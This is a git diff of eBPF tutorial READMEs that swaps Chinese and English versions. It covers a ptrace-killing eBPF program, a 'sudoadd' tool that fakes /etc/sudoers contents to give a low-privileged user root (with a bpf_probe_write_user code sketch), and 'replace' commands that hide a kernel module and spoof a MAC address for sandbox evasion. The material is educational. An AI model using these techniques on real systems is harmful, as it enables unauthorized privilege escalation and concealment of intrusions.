Anomaly Detection and Response:** -### 现有方案的不足 +Any system running in a production environment may face various anomalies, from simple resource leaks to complex malware attacks. In these situations, the system needs to detect these anomalies quickly and accurately and take appropriate countermeasures. -为了满足上述使用场景的需求,传统的技术方法如下: +**3. Dynamic System Management:** -- 安装一个 bpf 程序,该程序会持续监视系统,同时对一个 map 进行轮询。 -- 当某个事件触发了 bpf 程序中定义的特定条件时,它会将相关数据写入此 map。 -- 接着,外部分析工具会从该 map 中读取数据,并根据读取到的信息向目标进程发送信号。 +With the rise of cloud computing and microservice architectures, dynamically adjusting resource configurations and application behaviors based on the current system state has become a key requirement. For example, auto-scaling based on traffic fluctuations or reducing CPU frequency when detecting system overheating. -尽管这种方法在很多场景中都是可行的,但它存在一个主要的缺陷:从事件发生到外部工具响应的时间延迟可能相对较大。这种延迟可能会影响到事件的响应速度,从而使得性能分析的结果不准确或者在面对恶意活动时无法及时作出反应。 +### Limitations of Existing Solutions -### 新方案的优势 +To meet the needs of the above use cases, traditional technical methods are as follows: -为了克服传统方法的这些限制,Linux 内核提供了 `bpf_send_signal` 和 `bpf_send_signal_thread` 这两个 helper 函数。 +- Install a bpf program that continuously monitors the system while polling a map. +- When an event triggers specific conditions defined in the bpf program, it writes related data to this map. +- Then, external analysis tools read data from this map and send signals to the target process based on the retrieved information. -这两个函数带来的主要优势包括: +Although this method is feasible in many scenarios, it has a major flaw: the time delay from when the event occurs to when the external tool responds can be relatively large. This delay can affect the speed of event response, making performance analysis results inaccurate or failing to respond promptly to malicious activity. -**1. 实时响应:** -通过直接从内核空间发送信号,避免了用户空间的额外开销,这确保了信号能够在事件发生后立即被发送,大大减少了延迟。 +### Advantages of the New Solution -**2. 准确性:** -得益于减少的延迟,现在我们可以获得更准确的系统状态快照,这对于性能分析和异常检测尤其重要。 +To overcome the limitations of traditional methods, the Linux kernel offers the `bpf_send_signal` and `bpf_send_signal_thread` helper functions. -**3. 灵活性:** -这些新的 helper 函数为开发人员提供了更多的灵活性,他们可以根据不同的使用场景和需求来自定义信号的发送逻辑,从而更精确地控制和管理系统行为。 +The main advantages of these functions include: -## 内核态代码分析 +**1. Real-time Response:** -在现代操作系统中,一种常见的安全策略是监控和控制进程之间的交互。尤其在Linux系统中,`ptrace` 系统调用是一个强大的工具,它允许一个进程观察和控制另一个进程的执行,并修改其寄存器和内存。这使得它成为了调试和跟踪工具(如 `strace` 和 `gdb`)的主要机制。然而,恶意的 `ptrace` 使用也可能导致安全隐患。 +By sending signals directly from kernel space, avoiding extra overhead in user space, signals can be sent immediately after an event occurs, significantly reducing latency. -这个程序的目标是在内核态监控 `ptrace` 的调用,当满足特定的条件时,它会发送一个 `SIGKILL` 信号终止调用进程。此外,为了调试或审计目的,该程序会记录这种干预并将相关信息发送到用户空间。 +**2. Accuracy:** -## 代码分析 +Thanks to reduced latency, we can now obtain a more accurate snapshot of the system state, especially important for performance analysis and anomaly detection. -### 1. 数据结构定义 (`signal.h`) +**3. Flexibility:** + +These new helper functions provide developers with more flexibility. They can customize the signal sending logic according to different use cases and needs, allowing for more precise control and management of system behavior. + +## Kernel Code Analysis + +In modern operating systems, a common security strategy is to monitor and control interactions between processes. Especially in Linux systems, the `ptrace` system call is a powerful tool that allows one process to observe and control the execution of another process, modifying its registers and memory. 
This makes it the primary mechanism for debugging and tracing tools like `strace` and `gdb`. However, malicious use of `ptrace` can also pose security risks.

-这个程序的目标是在内核态监控 `ptrace` 的调用,当满足特定的条件时,它会发送一个 `SIGKILL` 信号终止调用进程。此外,为了调试或审计目的,该程序会记录这种干预并将相关信息发送到用户空间。
+The goal of this program is to monitor `ptrace` calls in kernel mode. When specific conditions are met, it sends a `SIGKILL` signal to terminate the calling process. Additionally, for debugging or auditing purposes, the program logs this intervention and sends related information to user space.

-## 代码分析
+## Code Analysis

-### 1. 数据结构定义 (`signal.h`)
+### 1. Data Structure Definition (`signal.h`)

signal.h

@@ -63,9 +69,9 @@
};
```

-这部分定义了一个简单的消息结构,用于从内核的 eBPF 程序传递事件到用户空间。结构包括进程ID、命令名和一个标记是否成功发送信号的布尔值。
+This section defines a simple message structure used to pass events from eBPF programs in the kernel to user space. The structure includes the process ID, command name, and a boolean value indicating whether the signal was successfully sent.

-### 2. eBPF 程序 (`signal.bpf.c`)
+### 2. eBPF Program (`signal.bpf.c`)

signal.bpf.c

@@ -121,57 +127,56 @@ int bpf_dos(struct trace_event_raw_sys_enter *ctx)
}
```

-- **许可证声明**
+- **License Declaration**

-  声明了程序的许可证为 "Dual BSD/GPL",这是为了满足 Linux 内核对 eBPF 程序的许可要求。
+  The program's license is declared as "Dual BSD/GPL". This is to meet the Linux kernel's licensing requirements for eBPF programs.

- **Ringbuffer Map**

-  这是一个 ring buffer 类型的 map,允许 eBPF 程序在内核空间产生的消息被用户空间程序高效地读取。
+  This is a ring buffer type map that allows messages generated by the eBPF program in kernel space to be efficiently read by user space programs.

-- **目标父进程ID**
+- **Target Parent Process ID**

-  `target_ppid` 是一个可选的父进程ID,用于限制哪些进程受到影响。如果它被设置为非零值,只有与其匹配的进程才会被目标。
+  `target_ppid` is an optional parent process ID used to limit which processes are affected. If set to a non-zero value, only processes that match it will be targeted.

-- **主函数 `bpf_dos`**
+- **Main Function `bpf_dos`**

-  - **进程检查**
-    程序首先获取当前进程的ID。如果设置了 `target_ppid`,它还会获取当前进程的父进程ID并进行比较。如果两者不匹配,则直接返回。
+  - **Process Check**
+    The program first retrieves the current process's ID. If `target_ppid` is set, it also retrieves the current process's parent process ID and compares them. If they don't match, it returns immediately.

-  - **发送信号**
-    使用 `bpf_send_signal(9)` 来发送 `SIGKILL` 信号。这将终止调用 `ptrace` 的进程。
+  - **Sending Signal**
+    It uses `bpf_send_signal(9)` to send a `SIGKILL` signal. This terminates the process calling `ptrace`.

-  - **记录事件**
-    使用 ring buffer map 记录这个事件。这包括了是否成功发送信号、进程ID以及进程的命令名。
+  - **Logging the Event**
+    The event is logged using the ring buffer map. This includes whether the signal was successfully sent, the process ID, and the process's command name.

-总结:这个 eBPF 程序提供了一个方法,允许系统管理员或安全团队在内核级别监控和干预 `ptrace` 调用,提供了一个对抗潜在恶意活动或误操作的额外层次。
+In summary, this eBPF program gives system administrators or security teams a way to monitor and intervene in `ptrace` calls at the kernel level, offering an additional layer of defense against potential malicious activity or misoperation.

-## 编译运行
+## Compilation and Execution

-eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。
+eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the `ecc` compiler toolchain and `ecli` runtime. We use eunomia-bpf to compile and run this example.
-编译: +Compilation: ```bash ./ecc signal.bpf.c signal.h ``` -使用方式: +Usage: ```console $ sudo ./ecli package.json TIME PID COMM SUCCESS ``` -这个程序会对任何试图使用 `ptrace` 系统调用的程序,例如 `strace`,发出 `SIG_KILL` 信号。 -一旦 eBPF 程序开始运行,你可以通过运行以下命令进行测试: +This program will send a `SIG_KILL` signal to any program attempting to use the `ptrace` system call, such as `strace`. Once the eBPF program starts running, you can test it by running the following command: ```bash $ strace /bin/whoami Killed ``` -原先的 console 中会输出: +The original console will output: ```txt INFO [bpf_loader_lib::skeleton] Running ebpf program... @@ -179,15 +184,17 @@ TIME PID COMM SUCCESS 13:54:45 8857 strace true ``` -完整的源代码可以参考: +The complete source code can be found at: -## 总结 +## Conclusion -通过这个实例,我们深入了解了如何将 eBPF 程序与用户态程序相结合,实现对系统调用的监控和干预。eBPF 提供了一种在内核空间执行程序的机制,这种技术不仅限于监控,还可用于性能优化、安全防御、系统诊断等多种场景。对于开发者来说,这为Linux系统的性能调优和故障排查提供了一种强大且灵活的工具。 +Through this example, we delved into how to combine eBPF programs with user-space programs to monitor and intervene in system calls. eBPF provides a mechanism for executing programs in kernel space. This technology is not limited to monitoring but can also be used for performance optimization, security defense, system diagnostics, and various other scenarios. For developers, it offers a powerful and flexible tool for performance tuning and troubleshooting in Linux systems. -最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +Lastly, if you are interested in eBPF technology and wish to further understand and practice, you can visit our tutorial code repository and tutorial website . -## 参考资料 +## References - - + +> The original link of this article: diff --git a/src/25-signal/README.zh.md b/src/25-signal/README.zh.md new file mode 100644 index 0000000..be96d62 --- /dev/null +++ b/src/25-signal/README.zh.md @@ -0,0 +1,193 @@ +# eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 + +eBPF (扩展的伯克利数据包过滤器) 是 Linux 内核的一种革命性技术,允许用户在内核空间执行自定义程序,而不需要修改内核源代码或加载任何内核模块。这使得开发人员可以非常灵活地对 Linux 系统进行观测、修改和控制。 + +本文介绍了如何使用 eBPF 的 bpf_send_signal 功能,向指定的进程发送信号进行干预。本文完整的源代码和更多的教程文档,请参考 + +## 使用场景 + +**1. 性能分析:** +在现代软件生态系统中,优化应用程序的性能是开发人员和系统管理员的一个核心任务。当应用程序,如 hhvm,出现运行缓慢或资源利用率异常高时,它可能会对整个系统产生不利影响。因此,定位这些性能瓶颈并及时解决是至关重要的。 + +**2. 异常检测与响应:** +任何运行在生产环境中的系统都可能面临各种异常情况,从简单的资源泄露到复杂的恶意软件攻击。在这些情况下,系统需要能够迅速、准确地检测到这些异常,并采取适当的应对措施。 + +**3. 动态系统管理:** +随着云计算和微服务架构的普及,能够根据当前系统状态动态调整资源配置和应用行为已经成为了一个关键需求。例如,根据流量波动自动扩容或缩容,或者在检测到系统过热时降低 CPU 频率。 + +### 现有方案的不足 + +为了满足上述使用场景的需求,传统的技术方法如下: + +- 安装一个 bpf 程序,该程序会持续监视系统,同时对一个 map 进行轮询。 +- 当某个事件触发了 bpf 程序中定义的特定条件时,它会将相关数据写入此 map。 +- 接着,外部分析工具会从该 map 中读取数据,并根据读取到的信息向目标进程发送信号。 + +尽管这种方法在很多场景中都是可行的,但它存在一个主要的缺陷:从事件发生到外部工具响应的时间延迟可能相对较大。这种延迟可能会影响到事件的响应速度,从而使得性能分析的结果不准确或者在面对恶意活动时无法及时作出反应。 + +### 新方案的优势 + +为了克服传统方法的这些限制,Linux 内核提供了 `bpf_send_signal` 和 `bpf_send_signal_thread` 这两个 helper 函数。 + +这两个函数带来的主要优势包括: + +**1. 实时响应:** +通过直接从内核空间发送信号,避免了用户空间的额外开销,这确保了信号能够在事件发生后立即被发送,大大减少了延迟。 + +**2. 准确性:** +得益于减少的延迟,现在我们可以获得更准确的系统状态快照,这对于性能分析和异常检测尤其重要。 + +**3. 灵活性:** +这些新的 helper 函数为开发人员提供了更多的灵活性,他们可以根据不同的使用场景和需求来自定义信号的发送逻辑,从而更精确地控制和管理系统行为。 + +## 内核态代码分析 + +在现代操作系统中,一种常见的安全策略是监控和控制进程之间的交互。尤其在Linux系统中,`ptrace` 系统调用是一个强大的工具,它允许一个进程观察和控制另一个进程的执行,并修改其寄存器和内存。这使得它成为了调试和跟踪工具(如 `strace` 和 `gdb`)的主要机制。然而,恶意的 `ptrace` 使用也可能导致安全隐患。 + +这个程序的目标是在内核态监控 `ptrace` 的调用,当满足特定的条件时,它会发送一个 `SIGKILL` 信号终止调用进程。此外,为了调试或审计目的,该程序会记录这种干预并将相关信息发送到用户空间。 + +## 代码分析 + +### 1. 
数据结构定义 (`signal.h`) + +signal.h + +```c +// Simple message structure to get events from eBPF Programs +// in the kernel to user space +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; +``` + +这部分定义了一个简单的消息结构,用于从内核的 eBPF 程序传递事件到用户空间。结构包括进程ID、命令名和一个标记是否成功发送信号的布尔值。 + +### 2. eBPF 程序 (`signal.bpf.c`) + +signal.bpf.c + +```c +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +SEC("tp/syscalls/sys_enter_ptrace") +int bpf_dos(struct trace_event_raw_sys_enter *ctx) +{ + long ret = 0; + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Send signal. 9 == SIGKILL + ret = bpf_send_signal(9); + + // Log event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + return 0; +} +``` + +- **许可证声明** + + 声明了程序的许可证为 "Dual BSD/GPL",这是为了满足 Linux 内核对 eBPF 程序的许可要求。 + +- **Ringbuffer Map** + + 这是一个 ring buffer 类型的 map,允许 eBPF 程序在内核空间产生的消息被用户空间程序高效地读取。 + +- **目标父进程ID** + + `target_ppid` 是一个可选的父进程ID,用于限制哪些进程受到影响。如果它被设置为非零值,只有与其匹配的进程才会被目标。 + +- **主函数 `bpf_dos`** + + - **进程检查** + 程序首先获取当前进程的ID。如果设置了 `target_ppid`,它还会获取当前进程的父进程ID并进行比较。如果两者不匹配,则直接返回。 + + - **发送信号** + 使用 `bpf_send_signal(9)` 来发送 `SIGKILL` 信号。这将终止调用 `ptrace` 的进程。 + + - **记录事件** + 使用 ring buffer map 记录这个事件。这包括了是否成功发送信号、进程ID以及进程的命令名。 + +总结:这个 eBPF 程序提供了一个方法,允许系统管理员或安全团队在内核级别监控和干预 `ptrace` 调用,提供了一个对抗潜在恶意活动或误操作的额外层次。 + +## 编译运行 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译: + +```bash +./ecc signal.bpf.c signal.h +``` + +使用方式: + +```console +$ sudo ./ecli package.json +TIME PID COMM SUCCESS +``` + +这个程序会对任何试图使用 `ptrace` 系统调用的程序,例如 `strace`,发出 `SIG_KILL` 信号。 +一旦 eBPF 程序开始运行,你可以通过运行以下命令进行测试: + +```bash +$ strace /bin/whoami +Killed +``` + +原先的 console 中会输出: + +```txt +INFO [bpf_loader_lib::skeleton] Running ebpf program... +TIME PID COMM SUCCESS +13:54:45 8857 strace true +``` + +完整的源代码可以参考: + +## 总结 + +通过这个实例,我们深入了解了如何将 eBPF 程序与用户态程序相结合,实现对系统调用的监控和干预。eBPF 提供了一种在内核空间执行程序的机制,这种技术不仅限于监控,还可用于性能优化、安全防御、系统诊断等多种场景。对于开发者来说,这为Linux系统的性能调优和故障排查提供了一种强大且灵活的工具。 + +最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +## 参考资料 + +- +- diff --git a/src/25-signal/README_en.md b/src/25-signal/README_en.md deleted file mode 100644 index 3160ac3..0000000 --- a/src/25-signal/README_en.md +++ /dev/null @@ -1,200 +0,0 @@ -# Using bpf_send_signal to Terminate Malicious Processes in eBPF - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. 
- -This article introduces how to use the `bpf_send_signal` feature of eBPF to intervene by sending signals to specified processes. For more tutorial documentation and complete source code, please refer to . - -## Use Cases - -**1. Performance Issues:** - -Optimizing the performance of applications is a core task for developers and system administrators in the modern software ecosystem. When applications, such as hhvm, run slowly or have abnormally high resource utilization, they can adversely affect the entire system. Therefore, pinpointing these performance bottlenecks and resolving them promptly is crucial. - -**2. Anomaly Detection and Response:** - -Any system running in a production environment may face various anomalies, from simple resource leaks to complex malware attacks. In these situations, the system needs to detect these anomalies quickly and accurately and take appropriate countermeasures. - -**3. Dynamic System Management:** - -With the rise of cloud computing and microservice architectures, dynamically adjusting resource configurations and application behaviors based on the current system state has become a key requirement. For example, auto-scaling based on traffic fluctuations or reducing CPU frequency when detecting system overheating. - -### Limitations of Existing Solutions - -To meet the needs of the above use cases, traditional technical methods are as follows: - -- Install a bpf program that continuously monitors the system while polling a map. -- When an event triggers specific conditions defined in the bpf program, it writes related data to this map. -- Then, external analysis tools read data from this map and send signals to the target process based on the retrieved information. - -Although this method is feasible in many scenarios, it has a major flaw: the time delay from when the event occurs to when the external tool responds can be relatively large. This delay can affect the speed of event response, making performance analysis results inaccurate or failing to respond promptly to malicious activity. - -### Advantages of the New Solution - -To overcome the limitations of traditional methods, the Linux kernel offers the `bpf_send_signal` and `bpf_send_signal_thread` helper functions. - -The main advantages of these functions include: - -**1. Real-time Response:** - -By sending signals directly from kernel space, avoiding extra overhead in user space, signals can be sent immediately after an event occurs, significantly reducing latency. - -**2. Accuracy:** - -Thanks to reduced latency, we can now obtain a more accurate snapshot of the system state, especially important for performance analysis and anomaly detection. - -**3. Flexibility:** - -These new helper functions provide developers with more flexibility. They can customize the signal sending logic according to different use cases and needs, allowing for more precise control and management of system behavior. - -## Kernel Code Analysis - -In modern operating systems, a common security strategy is to monitor and control interactions between processes. Especially in Linux systems, the `ptrace` system call is a powerful tool that allows one process to observe and control the execution of another process, modifying its registers and memory. This makes it the primary mechanism for debugging and tracing tools like `strace` and `gdb`. However, malicious use of `ptrace` can also pose security risks. - -The goal of this program is to monitor `ptrace` calls in kernel mode. 
When specific conditions are met, it sends a `SIGKILL` signal to terminate the calling process. Additionally, for debugging or auditing purposes, the program logs this intervention and sends related information to user space. - -## Code Analysis - -### 1. Data Structure Definition (`signal.h`) - -signal.h - -```c -// Simple message structure to get events from eBPF Programs -// in the kernel to user space -#define TASK_COMM_LEN 16 -struct event { - int pid; - char comm[TASK_COMM_LEN]; - bool success; -}; -``` - -This section defines a simple message structure used to pass events from eBPF programs in the kernel to user space. The structure includes the process ID, command name, and a boolean value indicating whether the signal was successfully sent. - -### 2. eBPF Program (`signal.bpf.c`) - -signal.bpf.c - -```c -// SPDX-License-Identifier: BSD-3-Clause -#include "vmlinux.h" -#include -#include -#include -#include "common.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -// Ringbuffer Map to pass messages from kernel to user -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -// Optional Target Parent PID -const volatile int target_ppid = 0; - -SEC("tp/syscalls/sys_enter_ptrace") -int bpf_dos(struct trace_event_raw_sys_enter *ctx) -{ - long ret = 0; - size_t pid_tgid = bpf_get_current_pid_tgid(); - int pid = pid_tgid >> 32; - - // if target_ppid is 0 then we target all pids - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - - // Send signal. 9 == SIGKILL - ret = bpf_send_signal(9); - - // Log event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = pid; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - bpf_ringbuf_submit(e, 0); - } - - return 0; -} -``` - -- **License Declaration** - - The program's license is declared as "Dual BSD/GPL". This is to meet the Linux kernel's licensing requirements for eBPF programs. - -- **Ringbuffer Map** - - This is a ring buffer type map that allows messages generated by the eBPF program in kernel space to be efficiently read by user space programs. - -- **Target Parent Process ID** - - `target_ppid` is an optional parent process ID used to limit which processes are affected. If set to a non-zero value, only processes that match it will be targeted. - -- **Main Function `bpf_dos`** - - - **Process Check** - The program first retrieves the current process's ID. If `target_ppid` is set, it also retrieves the current process's parent process ID and compares them. If they don't match, it returns immediately. - - - **Sending Signal** - It uses `bpf_send_signal(9)` to send a `SIGKILL` signal. This terminates the process calling `ptrace`. - - - **Logging the Event** - The event is logged using the ring buffer map. This includes whether the signal was successfully sent, the process ID, and the process's command name. - -In summary, this eBPF program provides a method that allows system administrators or security teams to monitor and intervene `ptrace` calls at the kernel level, offering an additional layer against potential malicious activities or misoperations. - -## Compilation and Execution - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. 
Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the `ecc` compiler toolchain and `ecli` runtime. We use eunomia-bpf to compile and run this example. - -Compilation: - -```bash -./ecc signal.bpf.c signal.h -``` - -Usage: - -```console -$ sudo ./ecli package.json -TIME PID COMM SUCCESS -``` - -This program will send a `SIGKILL` signal to any program attempting to use the `ptrace` system call, such as `strace`. Once the eBPF program starts running, you can test it by running the following command: - -```bash -$ strace /bin/whoami -Killed -``` - -The original console will output: - -```txt -INFO [bpf_loader_lib::skeleton] Running ebpf program... -TIME PID COMM SUCCESS -13:54:45 8857 strace true -``` - -The complete source code can be found at: - -## Conclusion - -Through this example, we delved into how to combine eBPF programs with user-space programs to monitor and intervene in system calls. eBPF provides a mechanism for executing programs in kernel space. This technology is not limited to monitoring but can also be used for performance optimization, security defense, system diagnostics, and various other scenarios. For developers, it offers a powerful and flexible tool for performance tuning and troubleshooting in Linux systems. - -Lastly, if you are interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository and tutorial website . - -## References - -- -- - -> The original link of this article: diff --git a/src/26-sudo/README.md index a7cc072..7fe9a66 100644 --- a/src/26-sudo/README.md +++ b/src/26-sudo/README.md @@ -1,25 +1,23 @@ -# 使用 eBPF 添加 sudo 用户 +# Using eBPF to Add a sudo User -本文完整的源代码: +The full source code for this article can be found at -关于如何安装依赖,请参考: - -编译: +Compilation: ```bash make ``` -使用方式: +Usage: ```sh sudo ./sudoadd --username lowpriv-user ``` -这个程序允许一个通常权限较低的用户使用 `sudo` 成为 root。 +This program allows a normally low-privileged user to become root using `sudo`. -它通过拦截 `sudo` 读取 `/etc/sudoers` 文件,并将第一行覆盖为 ` ALL=(ALL:ALL) NOPASSWD:ALL #` 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 `cat` 或 `sudoedit` 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 `#` 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。 +It works by intercepting `sudo` reading the `/etc/sudoers` file and overwriting the first line with ` ALL=(ALL:ALL) NOPASSWD:ALL #`. This tricks `sudo` into thinking that the user is allowed to become root. Other programs such as `cat` or `sudoedit` are not affected, so as far as they are concerned the file is unchanged and the user does not have these permissions. The `#` at the end of the line ensures that the rest of the line is treated as a comment, so it does not break the logic of the file.
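How does this interception work at the eBPF level? The exact implementation lives in the bad-bpf repository linked below; the following is only a rough sketch of the mechanism, under stated assumptions: the map layout, program names, and hard-coded payload are illustrative, and the real tool additionally checks that the calling process is `sudo`, that the fd refers to `/etc/sudoers`, and builds the payload from the `--username` argument.

```c
// Illustrative sketch only -- not the actual bad-bpf source.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "Dual BSD/GPL";

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 1024);
    __type(key, __u64);   /* pid_tgid */
    __type(value, __u64); /* user-space buffer address passed to read() */
} read_bufs SEC(".maps");

SEC("tp/syscalls/sys_enter_read")
int enter_read(struct trace_event_raw_sys_enter *ctx)
{
    /* read(fd, buf, count): remember where the caller's buffer lives.
     * The real tool only does this for sudo reading /etc/sudoers. */
    __u64 pid_tgid = bpf_get_current_pid_tgid();
    __u64 buf = (__u64)ctx->args[1];
    bpf_map_update_elem(&read_bufs, &pid_tgid, &buf, BPF_ANY);
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int exit_read(struct trace_event_raw_sys_exit *ctx)
{
    __u64 pid_tgid = bpf_get_current_pid_tgid();
    __u64 *buf = bpf_map_lookup_elem(&read_bufs, &pid_tgid);
    if (!buf)
        return 0;
    /* Hypothetical hard-coded payload; the real tool builds
     * "<username> ALL=(ALL:ALL) NOPASSWD:ALL #" at load time. */
    char payload[] = "lowpriv-user ALL=(ALL:ALL) NOPASSWD:ALL #";
    if (ctx->ret >= (long)(sizeof(payload) - 1))
        bpf_probe_write_user((void *)*buf, payload, sizeof(payload) - 1);
    bpf_map_delete_elem(&read_bufs, &pid_tgid);
    return 0;
}
```

Because `bpf_probe_write_user` only modifies the buffer in the reading process's memory, the file on disk never changes, which is exactly why `cat` and `sudoedit` still see the original contents.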
-## 参考资料 +## References -- +- [https://github.com/pathtofile/bad-bpf](https://github.com/pathtofile/bad-bpf) \ No newline at end of file diff --git a/src/26-sudo/README.zh.md b/src/26-sudo/README.zh.md new file mode 100644 index 0000000..a7cc072 --- /dev/null +++ b/src/26-sudo/README.zh.md @@ -0,0 +1,25 @@ +# 使用 eBPF 添加 sudo 用户 + +本文完整的源代码: + +关于如何安装依赖,请参考: + +编译: + +```bash +make +``` + +使用方式: + +```sh +sudo ./sudoadd --username lowpriv-user +``` + +这个程序允许一个通常权限较低的用户使用 `sudo` 成为 root。 + +它通过拦截 `sudo` 读取 `/etc/sudoers` 文件,并将第一行覆盖为 ` ALL=(ALL:ALL) NOPASSWD:ALL #` 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 `cat` 或 `sudoedit` 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 `#` 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。 + +## 参考资料 + +- diff --git a/src/26-sudo/README_en.md b/src/26-sudo/README_en.md deleted file mode 100644 index 7fe9a66..0000000 --- a/src/26-sudo/README_en.md +++ /dev/null @@ -1,23 +0,0 @@ -# Using eBPF to add sudo user - -The full source code for this article can be found at - -Compilation: - -```bash -make -``` - -Usage: - -```sh -sudo ./sudoadd --username lowpriv-user -``` - -This program allows a user with lower privileges to become root using `sudo`. - -It works by intercepting `sudo` reading the `/etc/sudoers` file and overwriting the first line with ` ALL=(ALL:ALL) NOPASSWD:ALL #`. This tricks `sudo` into thinking that the user is allowed to become root. Other programs like `cat` or `sudoedit` are not affected, so the file remains unchanged and the user does not have these permissions. The `#` at the end of the line ensures that the rest of the line is treated as a comment, so it does not break the logic of the file. - -## References - -- [https://github.com/pathtofile/bad-bpf](https://github.com/pathtofile/bad-bpf) \ No newline at end of file diff --git a/src/27-replace/README.md b/src/27-replace/README.md index 9ab514c..516e840 100644 --- a/src/27-replace/README.md +++ b/src/27-replace/README.md @@ -1,40 +1,38 @@ -# 使用 eBPF 替换任意程序读取或写入的文本 +# Replace Text Read or Written by Any Program with eBPF -完整源代码: +See for the full source code. -关于如何安装依赖,请参考: - -编译: +Compile: ```bash make ``` -使用方式: +Usage: ```sh sudo ./replace --filename /path/to/file --input foo --replace bar ``` -这个程序将文件中所有与 `input` 匹配的文本替换为 `replace` 文本。 -这有很多用途,例如: +This program will replace all text in the file that matches 'input' with 'replace' text. +There are many use cases for this, such as: -隐藏内核模块 `joydev`,避免被如 `lsmod` 这样的工具发现: +Hiding the kernel module 'joydev' to avoid detection by tools like 'lsmod': ```bash ./replace -f /proc/modules -i 'joydev' -r 'cryptd' ``` -伪造 `eth0` 接口的 MAC 地址: +Spoofing the MAC address of the 'eth0' interface: ```bash ./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' ``` -恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。 +Malware performing anti-sandbox checks may look for MAC addresses as an indication of whether it is running in a virtual machine or sandbox, rather than on a "real" machine. -**注意:** `input` 和 `replace` 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 `$'\n'`,例如 `--replace $'text\n'`。 +**Note:** The lengths of 'input' and 'replace' must be the same to avoid introducing NULL characters in the middle of the text block. To input a newline character at a bash prompt, use `$'\n'`, for example `--replace $'text\n'`. -## 参考资料 +## References -- +- . 
\ No newline at end of file diff --git a/src/27-replace/README.zh.md b/src/27-replace/README.zh.md new file mode 100644 index 0000000..9ab514c --- /dev/null +++ b/src/27-replace/README.zh.md @@ -0,0 +1,40 @@ +# 使用 eBPF 替换任意程序读取或写入的文本 + +完整源代码: + +关于如何安装依赖,请参考: + +编译: + +```bash +make +``` + +使用方式: + +```sh +sudo ./replace --filename /path/to/file --input foo --replace bar +``` + +这个程序将文件中所有与 `input` 匹配的文本替换为 `replace` 文本。 +这有很多用途,例如: + +隐藏内核模块 `joydev`,避免被如 `lsmod` 这样的工具发现: + +```bash +./replace -f /proc/modules -i 'joydev' -r 'cryptd' +``` + +伪造 `eth0` 接口的 MAC 地址: + +```bash +./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' +``` + +恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。 + +**注意:** `input` 和 `replace` 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 `$'\n'`,例如 `--replace $'text\n'`。 + +## 参考资料 + +- diff --git a/src/27-replace/README_en.md b/src/27-replace/README_en.md deleted file mode 100644 index 516e840..0000000 --- a/src/27-replace/README_en.md +++ /dev/null @@ -1,38 +0,0 @@ -# Replace Text Read or Written by 